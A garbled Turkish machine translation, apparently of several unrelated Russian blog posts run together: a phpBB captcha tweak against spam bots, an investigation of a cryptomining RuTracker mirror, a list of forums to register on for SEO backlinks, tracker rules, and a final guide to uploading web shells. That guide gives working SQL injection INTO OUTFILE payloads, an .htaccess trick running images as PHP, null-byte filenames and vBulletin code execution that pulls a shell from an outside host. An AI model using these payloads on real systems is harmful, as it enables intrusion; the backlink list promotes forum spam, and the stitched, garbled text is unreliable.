PhpBB forum motorunun birçok avantajı vardır; hem kullanıcılar hem de moderatörler için uygundur ve sonuç olarak çok popülerdir. Ama buna yol açan popülerliktir ana dezavantaj- ona spam gönderiyorlar ve ona spam gönderiyorlar otomatik mod. Bir süre sonra, yeni sahte kullanıcıların sürekli kayıt akışı ve onlardan gelen spam mesajları site yönetiminin sinirlerini yıpratabilir.
Temel paketteki PhpBB sürüm 3.*, foruma kaydolurken kullanıcılara sunulabilecek 4 adede kadar captcha seçeneği içerir. Hatta var özet ancak, otomatik gönderim yapanlar için, uygulamanın gösterdiği gibi, bu bir engel değildir.
Bu programlar, çeşitli forum motorlarının kayıt sayfalarına tipik giriş noktalarının nasıl göründüğünü bilir. Bu bilgi, yeni kullanıcıların kaydedilmesi, mesaj gönderilmesi vb. için formlar içeren web sayfalarının DOM modellerinin tanınmasına dayanmaktadır. Yani, örneğin phpBB durumunda robot, kayıt için giriş noktasının /ucp.php?mode=register konumunda olduğunu ve bu sayfada şöyle bir düğme bulunduğunu bilir:
İçine girmeden teknik detaylar, bu düğmeyi bir HTML belgesinde en azından kimliğe veya isme göre bulabileceğinizi ve tıklayabileceğinizi unutmayın.
Robot, captcha'nın bulunduğu sayfaya ulaştığı anda captcha görüntüsünü alır ve onu tanımaya çalışır. Burada programın karmaşıklığına bağlı olarak OCR algoritmalarından yaşayan bir kişi tarafından basit captcha tanımaya kadar çeşitli teknolojiler kullanılabilir. Bu nedenle koruma çalışmıyor. Robotlar çok sayıda proxy sunucusu üzerinden spam yaptığından, IP adreslerini forumda yasaklamak da kesinlikle işe yaramaz. Bu anlamda adresleri yasaklamak ya da yeni otomatik kayıtları temizlemek hiç fark etmez; öyle ya da böyle hepsi zaman kaybıdır.
Otomatik gönderim yapanları ortadan kaldırmanın tek yolunun, foruma giriş noktası işaretlemesini benzersiz bir şekilde biraz değiştirmek olduğu ortaya çıktı. İki ya da üç yıl önce phpBB2 için bu yöntemi uyguladım ve işe yaradı; otomatik kayıtlar durduruldu. Aynı şey yakın zamanda başka bir sitede, zaten phpBB3 motorunda doğrulandı.
Daha sonra, phpBB kayıt sayfasını değiştirmenin kanıtlanmış spesifik bir örneğini vereceğim. Ancak bu gönderinin bir koruma konsepti önerdiğini belirtmek isterim. otomatik kayıtlar belirli yöntemler yerine forumlarda. Her şey forum yöneticisinin ellerine ve kafasına bağlıdır. Temel html ve css bilgisine sahip olmanız tavsiye edilir. Okuyucular topluca kopyalamaya başlarsa bu yöntem, daha sonra spam gönderenler bu "buluşsal yöntemi" yazılımlarına programlayacak ve otomatik kayıtlar devam edecek.
Bu nedenle, phpBB forum ayarlarında en basit captcha olan “GD'siz CAPTHA”yı seçin.
Tarayıcıda şöyle görünür (FF3):
Captcha görüntüsü alanındaki kayıt sayfasının işaretlemesine bakarsanız şöyle görünür:
Aslında src özelliği img etiketi ve captcha içeren bir resim içerir. Forumda güncel konunun yüklü olduğu bir klasör açın. Benim durumumda bu prosilver: /forum/styles/prosilver/template. İçinde captcha_default.html dosyasını buluyoruz. Bu şablona bakarsanız yukarıdaki işaretlemenin oluştuğu yeri görebilirsiniz:
Küçük bir hareketle otomatik gönderenlerin hayatını zorlaştıralım:
Artık tarayıcıda şöyle görünecek:
Katılıyorum, pek hoş değil ama artık yöneticinin sinirleri düzelecek. Düzenli kullanıcılar hala kayıt olabilirsiniz. Tabii ki, motoru daha fazlasına yükseltirken yeni sürüm Bu düzeltmeyi tekrar yapmayı hatırlamanız gerekecek. Umarım cesur phpbb kullanıcıları bu konuya takılıp kalmazlar bu örnekte ancak önerilen koruma konseptine göre giriş noktasını değiştirmenin başka yollarını bulacaklar.
RuTracker aynalarından birine giriş yapmaya çalıştığınızda, bunun yalnızca sitenin bilgisayarınızda hesaplama yapmasına, başka bir deyişle kripto para madenciliği yapmasına izin vermeniz durumunda mümkün olabileceğini belirten bir mesajın görüntülendiğini yazdım.
Bundan sonra yorumlarda gerçekten aptal olduğumu, anlattığım aynaların root tracker'a ait olmadığını ve root tracker'ın kendisiyle hiçbir şekilde bağlantılı olmadığını belirten öfkeli mesajlar aldım. Ben buna pek önem vermedim ve o nota yapılan yorumlarda soruyu sordum peki ya ayna rutracker-org.appspot.com sadece rutracker'ın resmi web sitesinin tasarımını tekrarlamakla kalmıyor rutracker.org, ama aynı zamanda içeriğini tamamen tekrarlıyor. Ancak buna yanıt olarak şunu duydum: " Sen bir aptalsın Volokh ve hiçbir şey anlamıyorsun".
Aklı başında bir insana yakışır şekilde aşağıdakileri düşünmeye başlar: Eğer bana aptal olduğumu söylerlerse, o zaman bu doğru olabilir mi? Ben de öyle düşündüm, ama ortaya çıktı ki hayır - bu durumda aptal değilim. Ama önce ilk şeyler.
RuTracker yöneticileri yorumlarda şunu söylemeye başladıktan sonra:
Başka aynamız ya da “çocuk projemiz” yok! Yapımızı ve tasarımımızı kopyalayan diğer tüm root tracker "klonlarının" bizimle hiçbir ilgisi yoktur, bunların kullanımı şifrelerin çalınmasına, bilgisayarınızın kripto para birimi madenciliği için kullanılmasına ve diğer sorunlara yol açabilir! Maintracker da sahte!!
Düşünmeye başladım, belki de gerçekten kendimi kaptırmışım ve RuTracker'daki adamlara boşuna iftira atıyordum. Tamam, resmi RuTracker web sitesindeki yorumları karşılaştırmaya karar verdim - rutracker.org ve rutracker aynasından gelen yorumlar rutracker-org.appspot.com, kripto para birimi oluşturmak için izin istedi. Yorumların tamamen aynı olduğu ortaya çıktı. Ama kimse bana inanmayacak, karar verdim ve ekran görüntüsü almak istedim. Ama bu fikir aynı zamanda aptalca görünüyordu çünkü... Yorumlar kolayca silinebilir ve düzenlenebilir.
En en iyi fikir video kaydı başladı. Gelin bir göz atalım, sonra burada olup bitenler hakkında yorum yapacağım:
Baktın mı? Hemen söyleyeyim, videoyu “olduğu gibi”, yani düzenlemeden sunuyorum. Bu nedenle herhangi bir yorum veya seslendirme yapılmamaktadır. Öyleyse burada neler olduğunu çözelim.
Başlangıç olarak ben yarattım posta kutusu siteye kayıt olmak için rutracker-org.appspot.com. Evet, tam olarak kripto para madenciliği yapan sitede. Neden resmi web sitesinde değil de onun üzerinde? rutracker.org? Gerçek şu ki, sitelerin ne olduğunu gösterme göreviyle karşı karşıya kaldım. rutracker-org.appspot.com Ve rutracker.org tek bir veritabanı, yani kök izleyici yöneticilerinin ifadelerinin aksine bu siteler birbirine bağlıdır.
Postamı açtıktan sonra açtım Tor tarayıcı ve üç sekme yükledim:
1. Resmi web sitesi rutracker.org;
2. Ayna RuTracker rutracker-org.appspot.com;
3. Açık bir posta kutusunun bulunduğu sekmeye tıklayın.
Bundan sonra RuTracker aynasında rutracker-org.appspot.com Kayıt oldum (Saat 00:25) ve hesap aktivasyon e-postası posta kutuma geldi (Saat 00:57). Ve burada ilginç danslar zaten başlıyor ya da site yöneticilerinin kıçını yakmasıyla ürpertici danslar başlıyor: aktivasyon kodu, izleyicinin resmi web sitesine bir bağlantı içeriyor (Saat 1:00):
https://rutracker.org/forum/profile.php?mode=activate&u=43055955&act_key=nUMiXqWX19EF
Bu bağlantı çalışıyor ve doğrudan resmi web sitesine yönlendiriyor rutracker.org. Bağlantıya tıkladığınızda aynada oluşturulan hesap rutracker-org.appspot.com resmi web sitesinde başarıyla etkinleştirildi rutracker.org(Zaman 1:06). Teknolojinin harikalarına ve yöneticinin mucizevi düşüncelerine. Görünüşe göre site yöneticileri için bir şeyler dumanlanmaya başlıyor. Ve tamam, dedikleri gibi ben bir aptalım, benden ne almalı. Devam edelim.
Hesabımı başarıyla etkinleştirdikten sonra aynaya gidiyorum rutracker-org.appspot.com ve siteye giriş yapmayı deneyin (Saat 1:45). Captcha'yı girdikten sonra oluşturulan oturuma başarıyla giriş yapıyorum. hesap"gayri resmi" izleyicide (Zaman 2:03). Ve şu anda aynı bildirim beliriyor (Zaman 2:07):
"İzin Ver" butonuna tıklıyorum (Saat 2:08) çünkü aksi halde giriş yapamayacaktım. Bundan sonra kişisel hesabımın boş olduğunu ve henüz yorum bırakmadığımı gösteriyorum (Zaman 2:20).
Şimdi ayna ile resmi site arasındaki ilişkiyi göstermek için sitede rastgele bir dağılım seçiyorum rutracker-org.appspot.com ve yorum bırakın (Zaman 3:10). Daha sonra resmi sitede rutracker.org Kök izleyici aynasında oluşturulan bir hesapla oturum açmaya çalışıyorum (Saat 3:40). Ve bakın, resmi web sitesinde "gayri resmi" aynadan gelen kullanıcı adı ve şifre ortaya çıktı (Saat 4:00). Tesadüf? Düşünme.
Daha da ileri gidelim, izleyicide bırakılan mesajların listesini ve gördüklerimizi açalım: konu listesinde tanıdık bir dağılım (Zaman 4:05). Muhtemelen bir tesadüftür ve daha ikna edici olması için bu dağıtıma bıraktığım yorumu yöneticiler tarafından tanınmayan bir aynada açıyorum (Zaman 4:17).
Yorumun sitedeki dağıtımla karşılaştırılması rutracker-org.appspot.com Ve rutracker.org(Saat 5.54) ve bu iki sitenin birbiriyle bağlantılı olduğuna bir kez daha ikna olduk.
Site yöneticileri bana ne yazdı? Görünüşe göre beni resmi web sitesi ve aynanın rutracker-org.appspot.com hiçbir şekilde birbirine bağlı değildir. İzleyici yöneticilerinin yorumları, tüm aynaların sitenin yapısını ve tasarımını kopyaladığını, ancak birbirine bağlı olmadığını açıkça belirtiyor. Ancak gördüğümüz kadarıyla, resmi web sitesi bazı sol görüşlü aynalardan gelen yorumları mı kopyalıyor? Hayır, bu da saçmalık. Gerçek nerede? Gerçek şu ki, bu iki sitenin tek bir veritabanı var ve çok sayıda ayna var; bunlardan bazıları izleyici yöneticileri tarafından tanınırken, diğerleri tanınmıyor ve kripto para birimi oluşturmak için kullanılıyor.
Görünüşe göre tüm bu zaman boyunca yorumlarda kulaklarıma saçma sapan şeyler dökmeye ve beni iddiaya göre tamamen yanlış bir siteye gittiğime ikna etmeye çalışıyorlardı ama aslında bu sitenin de RuTracker'a ait olduğu ortaya çıktı.
Artık bazı insanların beşinci noktanın iltihabını deneyimlemeye başlayacağını ve tehdit, hakaret vb. yağmuruna tutulacağını sanıyorum. Ama gerçekten adamlara saldırmanın boşuna olduğunu ve onların hiçbir şey için suçlanmayacağını düşünmüştüm. Tamamen farklı olduğu ortaya çıktı ve video da bunun kanıtı. Bir meslektaşının dediği gibi: RuTracker - benim için kardeş gibiydin.
Bu yüzden, daha fazlasını söyleyerek kimseyi şaşırtmayacağımı düşünüyorum. dış bağlantılar sitenize, TCI'sı ne kadar büyükse ve bağlantı veren sitenin TCI'sı ne kadar büyük olursa, bu bağlantının "ağırlığı" da o kadar büyük olur. Sitenize olan bağlantı kitlesini artırmanın birçok yolu vardır ancak bugün bunlardan yalnızca birinden bahsedeceğim. güven sitelerinden dış bağlantılar alma.
Bu yazımda tüm linkleri vermeyeceğim. güvenilen siteler, bunu biliyorum, ancak size bunlardan yalnızca birinden bahsedeceğim - forumlar.
Bir web sitesi belirleyebileceğiniz forumlara kaydolduğunuzda (Kural olarak aynı motorda yapılırlar), harici bir bağlantı alacaksınız.
Neden bahsettiğimizi netleştirmek için aşağıdaki ekran görüntüsüne bakın:
Yani, siteyi belirterek böyle bir foruma kaydolmanız yeterlidir. Hepsi bu. (En fazla kaydınızı onaylamanız gerekir, bu nedenle gerçek e-posta adresinizi belirtin). Genellikle sitenize bağlantı içeren bir sayfa şuna benzer:
Şimdi bu yöntemin dezavantajlarından bahsedelim, bence iki tane var:
1) Aktif olmamanız nedeniyle er ya da geç forumdan çıkarılacağını düşünüyorum (Ancak prensip olarak yeniden kaydolmak zor olmayacaktır).
2) Buna göre bağlantı çapası ayarlamak mümkün değildir. (Bu muhtemelen bir eksi bile değil, bir gerçektir, ama yine de).
Peki, şimdi şişman forumların listesi. Kolaylık sağlamak için, TCI'nin azalan sırasına göre:
Bağlantı (TCI)
http://forum.igromania.ru/register.php (1700) [Kayıt olun, ardından siteyi profilinizde belirtin, kaydedin]
http://orphus.ru/community/register.html (1500)
http://www.novosti-kosmonavtiki.ru/phpBB2/profile.php?mode=register (1100)
http://www.rmj.ru/phpbb/profile.php?mode=register (1000)
http://www.masterkit.ru/forum/profile.php?mode=register (700)
http://www.ib.ru/forum/profile.php?mode=register (400)
http://forum.mozilla-russia.org/register.php (300) [Profilinizde web sitesini belirtin]
http://mama-tv.ru/forum/profile.php?mode=register (230)
http://www.neodrive.ru/forum/profile.php?mode=register (170)
http://www.systemaspetsnaz.ru/pforum/profile.php?mode=register (150)
http://tele-club.ru/forum/profile.php?mode=register (130)
http://forum.anastasia.ru/profile.php?mode=register (130)
http://www.shalyapin.ru/forum/profile.php?mode=register (130)
http://www.sarinfo.org/forum/profile.php?mode=register (120)
http://nelubit.ru/profile.php?mode=register (100)
http://www.antisex.info/phpbb2/profile.php?mode=register (60)
http://forum.balletfriends.ru/profile.php?mode=register (50)
http://forum.rusbani.ru/profile.php?mode=register (50)
http://zoneland.ru/forum/profile.php?mode=register (40)
http://forum.av.by/profile.php?mode=register (30)
http://forummotor.israelinfo.ru/profile.php?mode=register (30)
http://wolfson.ru/forum/profile.php?mode=register (30)
http://forum.oslik.ru/profile.php?mode=register (30)
http://data-torrents.com/profile.php?mode=register (20)
http://forum.latfutbols.net/profile.php?mode=register (20)
http://www.forum.hyip-reflection.info/profile.php?mode=register (20)
http://wap.tanchiki.ru/for/profile.php?mode=register (10)
http://www.autoplustv.ru/forum/profile.php?mode=register (500)
http://www.spomir.ru/forum/profile.php?mode=register (350)
http://www.fireman.ru/talk/profile.php?mode=register (300)
http://www.fpss.ru/forum-new/profile.php?mode=register (240)
http://www.skaters.ru/forum/profile.php?mode=register (220)
http://www.a-ivanov.ru/forum/profile.php?mode=register (190)
http://abto-acc.ru/forum/profile.php?mode=register (150)
http://www.artdj.ru/forum/profile.php?mode=register (120)
http://doom-metal.ru/room/profile.php?mode=register (100)
http://www.frisbee.by/f/profile.php?mode=register&agreed=true (80)
http://www.texinfo.ru/forum/ucp.php?mode=register (80) [Profilde]
http://globax.biz/forum/profile.php?mode=register (70)
http://www.gracebyte.com/forum/profile.php?mode=register (70)
http://forumjnews.israelinfo.ru/profile.php?mode=register (60)
http://yartech.ru/forum/ucp.php?mode=register (40) [Profilde]
http://amrita-dance.ru/forum/profile.php?mode=register (30)
http://forum.isnet.ru/profile.php?mode=register (30)
http://forum.interair.ru/profile.php?mode=register (0
___________________________________________________________________
Son veritabanı güncellemesi 06/16/11 idi(Liste bozuk bağlantılardan temizlendi + satırın altındaki birkaç site daha eklendi)
Ayrıca güvenilen bir site sayesinde sadece TIC'yi artırmakla kalmaz, aynı zamanda site trafiğini de artırabilirsiniz! Ancak bunun için çok sayıda iyi güvenilir siteye ihtiyacınız var ve bunlar kural olarak zaten para karşılığında satılıyor. Peki, satın alıp almayacağınıza kendiniz karar verin...
Sonuç olarak şunu söyleyebilirim ki, tüm forumlara aynı anda kayıt olmayın, aksi takdirde siteniz bir tür filtrenin altına düşebilir. Günde 5-8 yeterli bence. Tüm. İyi şanlar. 😉
Dikkat!
Bu notu 2015 yılında yazıyorum ve şunu söylemek istiyorum ki, artık blogunuza (sitenize) bağlantıları bu veya diğer yeni güven sitelerinde bırakarak, yalnızca zamanınızı boşa harcayacaksınız. Bu nedenle yorumlarda tekrarlanan sorulardan kaçınmak için buraya yazacağım - bu listede herhangi bir güncelleme olmayacak.
Listeme göz atmanızı tavsiye ederim. Elbette bu tür bloglara mesaj göndermek de eskisi kadar etkili değil ama yine benim şahsi fikrime göre kat kat daha etkili.
İzleyicideki kurallar ve kısıtlamalar.
1. Genel hükümler ve kısıtlamalar
1.1. Bu izleyici kuralları tartışılamaz ve izleyicide bulunan herkes tarafından koşulsuz olarak takip edilmelidir. İstisnai durumlarda kuralların bazı hükümlerine yalnızca Tracker Yöneticilerinin uymamasına izin verilir.
1.2. Takipçi yönetimi, takipçi ve kullanıcıları ile ilgili her türlü ihtilaf durumunun çözümlenebileceği tek ve en yüksek otoritedir. Bu nedenle Yöneticilerin kararları kesindir ve temyiz edilemez.
1.3. Tracker yönetimi, bu kuralların tüm maddelerini önceden veya sonradan bildirimde bulunmaksızın değiştirme ve ekleme hakkını saklı tutar. Kurallara yapılan eklemeler ve değişiklikler yayınlandıkları andan itibaren yürürlüğe girer. Ancak, iyi niyet göstergesi olarak Yönetim, mümkün olan her fırsatta bu tür değişiklikleri kullanıcıların dikkatine sunmaya çalışacaktır.
1.4. Bunların ve diğer Takipçi Kurallarının göz ardı edilmesi, kişiyi yalnızca bunları ihlal etme sorumluluğundan kurtarmaz, aynı zamanda başlı başına bir ihlal ve ağırlaştırıcı bir durumdur.
1.5. Yükleme ve İndirme işlemlerinizle ilgili verileri tahrif edecek herhangi bir program kullanmak yasaktır. Hile yapanlar anında banlanır.
1.7. Takipçi arızalarının ve hatalarının kişisel amaçlarla kullanılması yasaktır. Arıza ve hata tespiti halinde Takipçi Yönetimine bilgi vermeniz gerekmektedir.
2. Kayıt
Kayıt, izleyicide olmanın ayrılmaz bir parçasıdır. Kayıt otomatik olarak bu Kuralları kabul ettiğinizi gösterir. Bu Kuralları kabul etmiyorsanız, yönetime yazın.
2.1. ÇEŞİTLİ YABANCI PROXY SUNUCULARDAN KAYIT YASAKTIR. İhlal edenler - anında yasaklanma!!!
İstisnai durumlarda, ancak başvurunun idare tarafından değerlendirilmesinden sonra izin verilir.
2.2. BİR BİLGİSAYARDAN İKİDEN FAZLA HESAP KAYIT ETMEK YASAKTIR. İhlal durumunda mevcut tüm hesaplar yasaklanır.
Mevcut iki hesaptan sonra yeni bir hesabın kaydedilmesi ancak idarenin onayı ile mümkündür.
3. Eller hakkında yorum yapma kuralları
3.1. Yayınlara yapılan yorumlarda küfür kullanılması, her türlü müstehcen kelime ve ifadeler, yabancı diller de dahil olmak üzere örtülü müstehcenlik kullanılması yasaktır.
Ceza: Kurallara aykırı yorumların kaldırılması ve 1 hafta süreyle yorum yazma yasağı. Daha sonraki ihlallerde bu kuralın 7 gün süreyle yorum yazma yasağı ve 14 gün süreyle yorum yazma yasağı. Gelecekte yorum yazma konusunda kalıcı bir yasak olacaktır.
3.2. Tracker katılımcılarına her ne şekilde olursa olsun hakaret etmek yasaktır. Hem takipçideki kişisel mesajlarda hem de dağıtımlara yapılan yorumlarda, diğer katılımcılara karşı her türlü kabalık, kişisel hakaret ve müstehcen ifadelerin sergilenmesi, itibarlarına zarar verilmesi, şeref ve haysiyetlerinin aşağılanması, kişisel ilişkilerin kamuya açıklanması da dahil olmak üzere yasaktır. Katılımcılar saygılı iletişimi sürdürmelidir.
Ceza: Kurallara aykırı yorumların kaldırılması ve ihlal edenin 7 gün süreyle yasaklanması. Bu kuralın daha sonra ihlali, 7 gün süreyle yasaklama ve 30 gün boyunca yorum yazma yasağı ile sonuçlanacaktır. Gelecekte yorum yazma konusunda kalıcı bir yasak olacaktır.
3.3. Her türlü tehdit yasaktır (izleyici katılımcılarına yönelik sanal, gerçek ve diğer tehditler).
Ceza: Mesajların silinmesi ve suçlunun 14 gün süreyle yasaklanması. Bu kural tekrar ihlal edilirse bir ay süreyle yasaklanırsınız.
3.4. Alevli (ilgili olmayan, tartışma başlatmayı amaçlayan mesajlar ve ayrıca tartışanların kişiselleştirilmesi), taşma (konuya uymayan, anlamsal yük taşımayan veya yalnızca ifadelerden oluşan mesajlar), konu dışı ( tartışılan konuyla ilgili olmayan mesajların yanı sıra sel, alevlenme, konu dışı teşvikler ve "Yardım", "Sorun", "Neden bahsediyorsun ha?" veya "Yani anlamıyorum - nereden indireceğim?" ve benzerleri bu dağıtımla ilgili değildir. Bir yorumda en fazla 3 ifade bulunabilir.
Ceza: Kurallara aykırı olan yorumların kaldırılması ve yorum yazarının 3 gün süreyle uyarılması. Bu kuralın tekrar ihlal edilmesi durumunda yorumun yazarı 7 gün süre ile yorum yazmaktan men edilecektir. Gelecekte, her ihlal için 14 gün süreyle yorum bırakma yasağı ve 14 gün süreyle indirme yasağı getirilecek.
3.5. Yorumlarda ticari mesajların, doğrudan veya dolaylı reklamların, spam postaların ve dağıtımla doğrudan ilgisi olmayan sitelere bağlantıların yayınlanması yasaktır.
Ceza: Reklamın kaldırılması, 7 gün süre ile yorum yazma yasağı, 7 gün süre ile indirme yasağı. İhlalin tekrarı halinde 15 gün yorum yazma yasağı ve 15 gün indirme yasağı uygulanır. Gelecekte yorum yazma konusunda kalıcı bir yasak olacaktır.
3.6. Yorumlarda ırksal, ulusal ve dini düşmanlık göstermek, siyasi partileri kışkırtmak, terörizmi, aşırıcılığı, uyuşturucuyu, dini ve genel kabul görmüş ahlak ve ahlak kurallarına aykırı diğer konuları teşvik etmek yasaktır.
Ceza: Kurallara aykırı yorumların silinmesi, 14 gün süre ile yorum yazma yasağı ve 14 gün süre ile indirme yasağı. İhlalin tekrarı halinde 30 gün süre ile yorum yazma yasağı ve 30 gün süre ile indirme yasağı uygulanır. Gelecekte yorum yazma konusunda kalıcı bir yasak olacaktır.
3.7. Rusya Federasyonu Ceza Kanununu açıkça veya gizlice ihlal eden yorumların yanı sıra yasa dışı eylemlerin yapılmasını talep eden mesajların bırakılması yasaktır.
Ceza: Mesajların silinmesi, 14 gün yorum yazma yasağı, 14 gün indirme yasağı. İhlalin tekrarlanması durumunda, ihlalde bulunan kişi 30 gün süreyle yasaklanır. Üçüncü ihlal için - kalıcı bir yasak.
3.8. Dağıtımlara yapılan yorumlarda kullanıcıların kişisel verilerinin, gizli verilerinin, gerçek tam adlarının açıklanması, fotoğraf yayınlanması, hakkında bilgi yayılması yasaktır. mahremiyet Rızası olmadan kişisel veya aile sırrını oluşturan tartışmaya katılan kişi.
Ceza: Kurallara aykırı yorumların kaldırılması ve izleyiciye sözlü uyarı verilmesi. İhlalin tekrarı halinde 7 gün süre ile yorum yazma yasağı. İlerleyen süreçte 30 gün süreyle yorum yazma yasağı getirilecek.
3.9. Yorumlarda pornografi, şiddet sahneleri veya diğer kullanıcıları küçük düşüren veya hakaret eden görseller içeren görsellerin paylaşılması yasaktır.
Ceza: Kurallara aykırı olan yorumların silinmesi ve 7 gün süre ile yorumların indirilmesi ve bırakılmasının yasaklanması. İhlalin tekrarı halinde kullanıcı 7 gün süre ile yasaklanır. Gelecekte - 15 günlük bir süre için yasak ve kalıcı olarak yorum yazma yasağı.
3.10. Yorumlarda Rusça dışında bir dil ve Kiril dışında bir yazı tipi kullanılması yasaktır.
Ceza: Mesajların silinmesi ve kullanıcıya sözlü uyarıda bulunulması; bu paragraftaki kuralların tekrar tekrar ihlal edilmesi durumunda 3 gün süre ile yorum yazma yasağı.
3.11. Mesajlarda aşağıdaki vurgulama yöntemlerinin kullanılması yasaktır: kırmızı, %75'ten fazla büyük harfler ve büyük yazı tipi boyutu moderatörlerin ve yöneticilerin ayrıcalığıdır.
Ceza: Mesajların silinmesi ve kullanıcıya sözlü uyarıda bulunulması; bu fıkradaki kuralların tekrar tekrar ihlal edilmesi halinde, 7 gün süre ile yorum yazma yasağı.
3.12. Aşırı alıntı yapmak yasaktır (diğer katılımcıların mesajlarından makul miktarları aşan miktarlarda alıntı yapmak (orijinal mesajın 10 satırından fazla)).
Ceza: Mesajın düzenlenmesi ve kullanıcının sözlü olarak uyarılması; bu paragraftaki kuralların tekrar tekrar ihlal edilmesi durumunda 3 gün süre ile yorum yazma yasağı.
3.13. Spoiler vermek yasaktır ve spoiler kullanmaktan kaçının (bilgisi başkalarının izleme deneyimini mahvedebilecek, maçın sonucu vb. önemli olay örgüsü noktalarının açıklanması).
Eğer spoiler olmadan yapamıyorsanız o zaman spoiler'ı [expand] etiketine dahil etmeli ve önüne "Spoiler" işaretini koymalısınız.
Not: “Spor” dağıtımlarında en fazla 11 yorumu (1 sayfa) bozmak yasaktır.
Ceza: Mesajın düzenlenmesi ve kullanıcıyı sözlü olarak uyarmak. Bu paragrafın kurallarını tekrar tekrar ihlal etmeniz durumunda 3 gün süreyle yorum yazmanız yasaklanacaktır.
3.14. Kasıtlı olarak yanlış bilgi içeren mesajların yayınlanması yasaktır.
Ceza: Kurallara aykırı yorumların kaldırılması ve kullanıcıya sözlü uyarı verilmesi. Bu paragrafın kurallarını tekrar tekrar ihlal etmeniz durumunda 7 gün süreyle yorum bırakmanız yasaklanacaktır.
Torrent yorum sistemi aşağıdaki amaçlar için tasarlanmıştır:
-Veren kişiye saygı ve şükranlarınızı ifade edin,
- Dağıtımla ilgili ilgilendiğiniz spesifik bir soruyu sorun,
- Hediyeyle ilgili ilginç bilgiler sağlayın.
4. Avatar ve imzalara ilişkin kısıtlamalar:
4.1. İmza:
- Maksimum yükseklik: 100 punto (başka bir deyişle, en fazla dört kullanıcı çubuğu veya on satırlık metin (yazı tipi boyutu 10); genişlik: 750 punto.
- İmzanın içerdiği görsellerin toplam ağırlığı 200 Kb'ı geçmemelidir.
- İçerik: şiddet, tehditler (demografik, ulusal, dini veya politik temelde), küfürlü dil (küfür, lakap takmak, kabalık vb.), sefahat (pornografi), her türlü ayrımcılık, reklam metinleri ve görselleri veya reklamlar kabul edilemez karakterdedir, bu kaynağın başlıklarının/sıralamalarının taklit edilmesinin yanı sıra kışkırtıcı görseller de vardır. Nazi sembollerini kullanıyor.
- Animasyon: Güçlü şekilde yanıp sönen altyazılar yasaktır (yanıp sönme derecesi yönetim tarafından belirlenir).
- Mesajlarınızın altındaki imza, herhangi bir ağ kaynağına bağlantı oluşturmak için kullanılamaz. (kullanıcı çubukları olan sitelere, youtube, google vb. hizmetlere verilen bağlantılar istisnadır)
4.2. Avatarı:
- Maksimum boyut: 100x100 piksel; ağırlık: 21 KB'a kadar.
- İçerik: şiddet, tehditler (demografik, ulusal, dini veya politik temelde), küfürlü dil (küfür, lakap takmak, kabalık vb.), sefahat (pornografi), her türlü ayrımcılık, uyuşturucu propagandası, ticari reklam ve reklam metinleri, bu kaynağın unvanlarının/rütbelerinin taklidi, yönetim üyelerinin avatarlarıyla kasıtlı benzerlik ve ayrıca kışkırtıcı görseller, dahil. Nazi sembollerini kullanıyor.
- Animasyon: Güçlü şekilde yanıp sönen avatarlar yasaktır (göz kırpma derecesi yönetim tarafından belirlenir).
Ceza: İmza ve avatarın kaldırılması veya kullanımının yasaklanması (yönetici tarafından belirlenir).
5. Sürümler
5.1. Yayıncının kişisel izni olmadan yayınların diğer izleyicilere yeniden yüklenmesi yasaktır. Başka bir izleyiciye yeniden yüklenmesi yasak olan bir yayının dağıtımını desteklemek, bağımsız yeniden yüklemeye eşdeğerdir ve 7. madde uyarınca cezalandırılır.
6. Diğer
6.1. VIP-file, letitbit ve diğerleri gibi dosya barındırma hizmetlerini kullanan dağıtım içeriklerinin yüklenmesi yasaktır...
6.2. Torrentleri indirmek için herhangi bir indirme yöneticisini kullanmak yasaktır.
7. Ceza:
5-6. paragraflarda belirtilen ihlaller için - 7 gün süreyle yasak. Bu kuralların tekrar tekrar ihlal edilmesi ömür boyu yasaklamayla sonuçlanacaktır.
Merhaba %username% ve arkadaşları. Siteye acilen bir kabuk yüklemeniz gerekiyor, asla bilemezsiniz, belki son ücret buna bağlıdır. Aslında işe yaramıyor. Burada birkaç örnek topladım (bunun için Tracy ve diğerlerine teşekkürler).
Kabuğu resmin üzerine dökelim
Özel bir yönetici paneliyle bir siteyi hacklediniz (tabii ki sadece test ediyorsunuz)... Ve bir web kabuğu yükleyemezsiniz, ancak resim yüklemesi vardır ve yalnızca .jpg, .gif, .png formatlarını yükler.
Bu durumda ne yapılabilir?
.gif uzantılı kabuğu resimlerin bulunduğu bir klasöre yerleştiriyoruz ve içeriğiyle birlikte bir .htaccess dosyası oluşturuyoruz
AddType uygulaması/x-httpd-php .gif
Bu komut .gif formatını php olarak çalıştıracaktır.
/shell.gif'i açmaya çalışıyorum
Ayrıca, eğer komut dosyası satır sonlarına karşı kayıtsız değilse, kabuğu aynı anda yeniden adlandırarak taşmaya çalışırız. kabuk.php%00.jpg, Shell.php'nin kullanılabilirliğini kontrol edin, ya olursa?
Whine'dan mysql.user aracılığıyla kabuk yükleme yöntemi
1) Kimin altında oturduğumuzu öğrenelim ve aynı zamanda onun MySQL haklarını da öğrenelim.
site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+--+
(Hadi kimin altında oturduğumuzu öğrenelim)
2) site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user=" kullanıcımız
"+--+
(Kullanıcımızın yetkilerini kontrol edelim. Çıkış sırasında hata verirse kullanıcımıza 0x hex yapabilirsiniz)
3) site.com/index.php?id=-1+union+select+1,"",3+from+mysql.user+into+outfile+" Dosyanın yolu
"+--+
(Mini kabuğu doldurun)
Not:
Her şeyin işe yaraması için yazma haklarına sahip olmanız ve köke giden tam yolu bilmeniz gerekir.
Ayrıca şunun gibi yazma izinlerini de kontrol edebilirsiniz:
site.com/index.php?id=1+and+1=0+union+Seç+1," Prava
",3+mysql.user+'dan+--+
Prava görüntülenirse haklarınız var demektir.
Aşağıdaki durum. vBulletin forum motorunun admin panelindeyiz
Hadi gidelim:
Eklentiler ve Ürünler -> Eklenti Yöneticisi -> Eklentiler ve Ürünler -> Eklenti Yöneticisi -> [Yeni Eklenti Ekle]
Şablonları seçin. Genellikle faq_complete'u seçin, Eklenti Etkin onay kutusunu seçip tıklayın, "Evet" olarak ayarlayın ve kaydedin.
localhost/forum/faq.php?cmd=phpinfo();
Eğer phpinfo()'yu yazdırmışsak, elimizdeki kabuğu düşünün.
Phpinfo'da forumun tam yolunu bulmanız gerekiyor (örneğin /home/u0000/site.ru/www/sell.php). Daha sonra web kabuğumuzu şuna dönüştürmemiz gerekiyor: txt dosyası ve herhangi bir web sitesine yükleyin
mysite.com/shell.txt
Kabuğu komutla doldur
localhost/forum/faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
